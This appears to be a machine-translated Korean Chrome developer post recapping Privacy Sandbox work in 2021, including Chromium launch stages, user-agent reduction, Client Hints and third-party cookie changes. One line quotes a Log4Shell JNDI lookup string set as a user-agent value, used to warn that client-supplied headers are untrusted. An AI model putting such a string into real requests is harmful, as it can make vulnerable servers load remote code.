개인 정보 보호 샌드박스의 Progress의 2021년 요약 버전에 오신 것을 환영합니다. Chrome에서 서드 파티 쿠키의 단계적 지원 중단과 개인 정보 보호가 강화된 웹을 지향하기까지의 과정에서 이룬 주요 기록을 살펴보세요. 일반적으로 Google에서는 프로젝트 전반의 소식과 함께 개인 정보 보호 샌드박스 타임라인 업데이트 개요를 공유하지만, 12월은 조용한 달이었습니다. 대신 2021년의 몇 가지 활동을 되돌아보는 한편 새해를 맞이하여 여러분이 제시할 수 있는 몇 가지 잠재적 결심을 제공해 드리겠습니다.
Chromium 개발 프로세스
새로운 웹 플랫폼 기능을 Chromium에 사용하려면 프로젝트의 공개 개발 프로세스를 거쳐야 합니다. 2021년 개인 정보 보호 샌드박스팀은
| 🥚 | 프로토타입 제작 의도 | 19 |
| 🧪 | 실험 의도 | 7 |
| 🚀 | 배송 의도 | 11 |
각각의 마일스톤은 더 광범위한 웹 생태계에 기여하도록 하는 초대이기도 합니다.
프로토타입 제작 인텐트는 토론과 초기 실험을 진행하는 첫 번째 체크포인트입니다. 즉, GitHub에서 문제를 만들어 질문하거나 W3C 및 IETF와 같은 표준 그룹의 토론 및 프레젠테이션에 참여할 수 있는 제안서를 제공할 수 있습니다. 여기서도 코딩이 시작됩니다. 즉, 기능 플래그 뒤에서 개발자 테스트에 프로토타입 기능이 제공될 것으로 예상할 수 있습니다. 초기 의견은 제안서를 검증하고 반복하는 데 매우 중요합니다.
오리진 트라이얼을 요청하려는 경우 실험 의도는 선택사항입니다. 개발자는 기능의 오리진 트라이얼에 가입한 다음 프로덕션에서 테스트할 수 있습니다. 이를 실험이라고 부르는 이유는 실제 환경에서 검증하려는 기능의 특정 측면이 있기 때문입니다. 테스트 결과를 테스트하고 공유할 수 있는 개발자는 기능을 반복하고 발전시키는 데 도움이 되는 귀중한 의견을 제공합니다.
배송 인텐트는 기능이 이제 완료되어 정식 버전으로 출시될 준비가 되었음을 알리는 최종 마일스톤입니다. 승인되면 기능이 향후 출시에 병합되고 Canary, 베타, 안정화 채널을 통해 진행됩니다. 기능이 안정화 버전에 출시되기 전에 Chrome의 Canary 및 베타 버전으로 사이트를 테스트하여 버그를 포착하고 보고해야 합니다.
제안서
각 개인 정보 보호 샌드박스 제안서에는 GitHub 저장소가 함께 제공됩니다. 저장소는 전반적인 기능, 브라우저 구현의 자세한 사양, 웹 생태계 전반의 기여를 문제 및 pull 요청 형태로 요약한 설명서를 호스팅합니다.
14개의 개인 정보 보호 샌드박스 저장소에서 다음을 수행했습니다.
| 💬 | 545 | 생성된 문제 |
| 250 | 문제 종료됨 | |
| 🛠️ | 261 | pull 요청 생성됨 |
| 223 | pull 요청 병합됨 |
설명 및 사양의 언어는 이미 표준 및 브라우저 개발에 익숙한 잠재고객을 타겟팅하는 경우가 많으므로 익숙하지 않으면 어려울 수 있습니다. 그러나 설명의 목적은 설명하는 데 있습니다. 명확하지 않거나 다뤄지지 않은 사항이 있는 경우 설명을 업데이트하고 명확히 할 수 있도록 문제를 제기하시기 바랍니다.
해결 방법
사용자 에이전트 스프링 청소
새해까지 다운였기 때문에 Chrome 100과 사용자 에이전트 문자열의 점진적 감소가 모두 증가하고 있습니다. 이는 코드에서 사용자 에이전트 문자열 사용을 다시 확인하여 이러한 변경사항의 영향을 받는지 확인하는 것이 좋습니다.
해당 영역을 찾으려면 다음 단계를 따르세요.
- JavaScript 코드에서
navigator.userAgent를 검색하거나 서버 코드의User-Agent헤더에 액세스합니다. - 문자열 파싱에서 2자리 버전에 관한 가정을 확인합니다. 예를 들어
\d\d또는\d{2}를 지정하는 정규식은\d+로 바꿔야 합니다. - 다음에 의존하는 모든 곳에서 문자열 사용을 확인합니다.
- 플랫폼 (운영체제) 버전
- 전체 Chrome 빌드 버전
- 휴대기기 이름
- 이 값은 향후 고정 문자열로 축소될 값입니다. 이러한 값에 액세스해야 하는 경우 User-Agent 클라이언트 힌트로 이전하세요.
12월의 한 가지 업데이트를 언급할 예정입니다. 사용자 에이전트 클라이언트 힌트를 채택하는 경우 배송지로 인텐트를 HTML에서 다른 출처로 위임하도록 설정 태그를 <meta> 예를 들면 다음과 같습니다.
<meta name="accept-ch" content="sec-ch-ua-model=( https://foo.bar )">
봄맞이 청소를 좋아한다면 user-agent 사용의 대안도 고려해 볼 수 있습니다. 문자열을 사용하여 휴대기기를 감지하고 있다면 이를 반응형 디자인으로 대체할 수 있는지 조사하세요. 기능 지원을 위해 브라우저 이름과 버전을 확인하는 경우 기능 감지를 대신 사용할 수 있는지 확인하세요.
클라이언트가 제공한 모든 값과 마찬가지로 사용자 에이전트는 정확성이나 제공을 보장하지 않는다는 점을 항상 기억해야 합니다. 최근 Log4j 취약점인 'Log4shell'에서 이러한 위험의 예를 확인할 수 있습니다. ${jndi:ldap://example.com/file}와 같은 값을 포함하도록 사용자 에이전트 문자열을 설정하는 클라이언트는 서버에서 이를 적극적으로 파싱하도록 사이트를 가져올 수 있습니다.
쿠키 분류
또 다른 전통적인 새해 활동은 양질의 식재료를 사용한 건강한 쿠키를 얻어 만족스러웠는지 확인하는 것입니다. 서드 파티 쿠키에 대한 지원을 중단하는 단계를 계속 진행함에 따라 사이트의 어떤 쿠키가 영향을 받는지 파악해야 합니다. 2020년에는 SameSite=None를 사용하여 모든 쿠키를 크로스 사이트 또는 서드 파티 사용에 맞게 표시해야 할 필요성이 커지면서 유리한 입지를 확보할 수 있었습니다.
SameSite 속성을 None로 설정한 모든 쿠키를 업데이트해야 합니다.
현재 다음과 같은 세 가지 방법을 고려해 볼 수 있습니다.
- 쿠키가 최상위 사이트와 1:1 관계에서만 필요한 경우 CHIPS 제안의 진행 상황을 따르세요. 즉,
Partitioned속성이 쿠키에 추가됩니다. - 쿠키가 크로스 사이트 컨텍스트에서는 사용되지만 내가 소유하고 운영하는 사이트에서만 사용되는 경우 쿠키가 퍼스트 파티 세트의 후보가 될 수 있습니다. 이를 위해서는
집합에 사이트를 정의하고
SameParty속성을 쿠키에 추가해야 합니다. - 쿠키가 여러 사이트에서 일종의 공유된 가치를 제공하는 데 사용되는 경우 크로스 사이트 추적을 사용하지 않는 대체 솔루션에 대한 더 광범위한 개인 정보 보호 샌드박스 제안을 조사합니다.
퍼스트 파티 쿠키를 개선할 수 있는 좋은 방법이 있으므로 건강에 특히 관심이 있는 경우라면 모든 쿠키 사용을 다시 살펴보는 것이 좋습니다.
의견
Google은 이러한 월간 업데이트를 계속 게시하고 개인 정보 보호 샌드박스를 전반적으로 진행하면서 개발자에게 필요한 정보와 지원을 제공하고자 합니다. 이 시리즈에서 개선해야 할 점이 있다면 @ChromiumDev Twitter를 통해 알려주시기 바랍니다. 보내주신 의견은 형식을 지속적으로 개선하는 데 활용됩니다.
개인 정보 보호 샌드박스 FAQ를 확인하세요. 개발자 지원 저장소에 제출한 문제를 기반으로 계속해서 확장되고 있습니다. 제안의 테스트 또는 구현과 관련하여 궁금한 점이 있으면 Google에 문의하세요.